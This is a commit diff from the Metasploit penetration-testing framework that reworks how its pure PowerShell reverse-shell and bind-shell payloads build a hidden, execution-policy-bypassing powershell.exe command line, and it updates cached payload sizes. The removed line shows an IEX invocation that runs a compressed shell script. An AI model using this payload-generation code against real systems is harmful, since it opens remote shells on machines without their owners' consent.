Land rapid7#9044, Address generation issues with pure PSH payloads

jmartin-tech · jmartin-tech · commit 57afc3b93987 · 2017-10-10T10:40:33.000-05:00
diff --git a/lib/msf/core/payload/windows/powershell.rb b/lib/msf/core/payload/windows/powershell.rb
@@ -44,7 +44,18 @@ def generate_powershell_code(conntype)
     script_in.gsub!('LHOST_REPLACE', lhost.to_s)
 
     script = Rex::Powershell::Command.compress_script(script_in)
-    "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
+    command_args = { 
+        noprofile: true,
+        windowstyle: 'hidden',
+        noninteractive: true,
+        executionpolicy: 'bypass'
+    }
+    cli =  Rex::Powershell::Command.generate_psh_command_line(command_args)
+    return "#{cli} \"#{script}\""
+  end
+
+  def generate
+    command_string
   end
 end
 end
diff --git a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1518
+  CachedSize = 1501
 
   include Msf::Payload::Single
   include Rex::Powershell::Command
diff --git a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1526
+  CachedSize = 1509
 
   include Msf::Payload::Single
   include Rex::Powershell::Command
diff --git a/modules/payloads/singles/windows/powershell_bind_tcp.rb b/modules/payloads/singles/windows/powershell_bind_tcp.rb
@@ -15,7 +15,7 @@
 ###
 module MetasploitModule
 
-  CachedSize = 1703
+  CachedSize = 1501
 
   include Msf::Payload::Windows::Exec
   include Rex::Powershell::Command
diff --git a/modules/payloads/singles/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
@@ -15,7 +15,7 @@
 ###
 module MetasploitModule
 
-  CachedSize = 1711
+  CachedSize = 1509
 
   include Msf::Payload::Windows::Exec
   include Msf::Payload::Windows::Powershell
diff --git a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
@@ -15,7 +15,7 @@
 ###
 module MetasploitModule
 
-  CachedSize = 1786
+  CachedSize = 1501
 
   include Msf::Payload::Windows::Exec_x64
   include Rex::Powershell::Command
diff --git a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
@@ -15,7 +15,7 @@
 ###
 module MetasploitModule
 
-  CachedSize = 1794
+  CachedSize = 1509
 
   include Msf::Payload::Windows::Exec_x64
   include Msf::Payload::Windows::Powershell
